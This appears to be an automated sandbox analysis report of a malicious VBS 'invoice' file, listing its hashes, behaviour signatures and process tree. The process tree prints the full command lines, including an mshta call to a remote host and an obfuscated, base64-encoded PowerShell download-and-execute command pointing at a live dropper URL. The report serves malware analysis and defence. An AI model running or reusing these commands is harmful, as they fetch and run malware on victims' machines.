Analysis

  • max time kernel
    17s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    06-01-2021 07:32

General

  • Target

    invoice-ID711675345593.vbs

  • Size

    317B

  • MD5

    730f4edff655d002cbf863543d542c10

  • SHA1

    59f1a7fdd6ff3e0a0191af7f6febaeaba1a4ae44

  • SHA256

    1c58b7edbf5afeeccdff1eda0694d86572e7e25df35cadba6d1c6cd11b6384bd

  • SHA512

    b16eefc3b7a188664ceb4385611305564f02585cb75a1ace40d45d49f22bf2c42686c147e09230f1d04658f5d04cfeec9fef9053604737fe3c7597bff0994441

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://nyanxcat.online/Runpe/test/N1/PS.jpg

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoice-ID711675345593.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1068
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" http://nyanxcat.online/Runpe/test/N1/Clean.txt
      2⤵
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:1728
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBgAEUAWAAgACgAKABuAGAAZQBgAFcAYAAtAE8AYgBqAGAARQBgAGMAYABUACAAKAAoACcATgBlAHQAJwArACcALgAnACsAJwBXAGUAYgBjACcAKwAnAGwAaQBlAG4AdAAnACkAKQApAC4AKAAoACcARAAnACsAJwBvACcAKwAnAHcAJwArACcAbgAnACsAJwBsACcAKwAnAG8AJwArACcAYQAnACsAJwBkACcAKwAnAHMAJwArACcAdAByAGkAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAbgAnACsAJwBnACcAKQApAC4ASQBuAFYAbwBrAEUAKAAoACgAJwBoAHQAdABwADoALwAvAG4AeQBhAG4AeABjAGEAdAAuAG8AbgBsAGkAbgBlAC8AUgB1AG4AcABlAC8AdABlAHMAdAAvAE4AMQAvAFAAUwAuAGoAcABnACcAKQApACkAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAFwAfAAvACcALAAnACgAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAXABcACcALAAnACkAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAXAAvACcALAAnAHsAJwApAC4AcgBlAHAAbABhAGMAZQAoACcALwBcACcALAAnAH0AJwApAA==
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1744
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
            PID:2028
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            4⤵
              PID:916
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              4⤵
                PID:1708
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                4⤵
                  PID:1624
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  4⤵
                    PID:1576

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Defense Evasion

            Modify Registry

            1
            T1112

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/1728-2-0x0000000000000000-mapping.dmp
            • memory/1744-4-0x0000000000000000-mapping.dmp
            • memory/1744-5-0x000007FEF38D0000-0x000007FEF42BC000-memory.dmp
              Filesize

              9.9MB

            • memory/1744-6-0x0000000002310000-0x0000000002311000-memory.dmp
              Filesize

              4KB

            • memory/1744-7-0x000000001AB50000-0x000000001AB51000-memory.dmp
              Filesize

              4KB

            • memory/1744-8-0x00000000023E0000-0x00000000023E1000-memory.dmp
              Filesize

              4KB

            • memory/1744-9-0x0000000001FA0000-0x0000000001FA1000-memory.dmp
              Filesize

              4KB

            • memory/1744-10-0x000000001C2A0000-0x000000001C2A1000-memory.dmp
              Filesize

              4KB

            • memory/1744-11-0x000000001C370000-0x000000001C371000-memory.dmp
              Filesize

              4KB

            • memory/1744-12-0x00000000026E0000-0x00000000026E7000-memory.dmp
              Filesize

              28KB

            • memory/1744-13-0x00000000026F0000-0x00000000026F8000-memory.dmp
              Filesize

              32KB

            • memory/1964-3-0x000007FEF7E60000-0x000007FEF80DA000-memory.dmp
              Filesize

              2.5MB